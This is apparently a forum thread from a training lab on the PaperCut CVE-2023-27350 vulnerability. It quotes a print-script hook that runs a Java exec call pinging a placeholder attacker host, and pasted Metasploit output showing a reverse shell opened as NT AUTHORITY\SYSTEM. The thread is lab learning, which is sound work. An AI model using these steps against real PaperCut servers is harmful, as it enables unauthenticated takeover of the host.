PaperCut: CVE-2023-27350 Discussion

Let’s discuss PaperCut: CVE-2023-27350. Please do not share any flags or writeups.

To heighten the severity of this issue, the executed scripts run in the context of the PrintCut service, which, in turn, executes as the fully privileged NT AUTHORITY\SYSTEM account on Windows installations (or the root account on Linux). Therefore, abusing this functionality gives a previously unauthenticated threat actor full privileges over the host!

Sad.

Very interesting.

As the scripts are executed through JavaScript, to perform code execution, we can simply use the Java exec() function to execute our code. We can therefore alter the code as follows.

//
// Customize your print process with Print Scripting.  You don't have to be a
// programmer to use Print Scripting.  Use one of the many pre-written recipes
// already written for you, or write your own in JavaScript using snippets and
// reference documentation.
//
function printJobHook(inputs, actions) {
	// your script here
}
java.lang.Runtime.getRuntime().exec('ping.exe ATTACKER_IP');

How can Js execute Java codes??

Okay I figured it out.

The scripts are written in JavaScript and execute in the context of the PrintCut service – which runs as NT AUTHORITY\SYSTEM on Windows deployments.

I like this.

┌──(kali㉿kali)-[/tmp/CVE-2023-27350]
└─$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/shell/reverse_tcp; set LHOST 10.11.76.25 ; set LPORT 4444; exploit"
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
LHOST => 10.11.76.25
LPORT => 4444
[*] Started reverse TCP handler on 10.11.76.25:4444 
[*] Sending stage (240 bytes) to 10.10.126.229
[*] Command shell session 1 opened (10.11.76.25:4444 -> 10.10.126.229:49966) at 2024-08-21 19:24:52 -0400


Shell Banner:
Microsoft Windows [Version 10.0.17763.1821]
-----
          

C:\Program Files\PaperCut NG\server>whoami
nt authority\system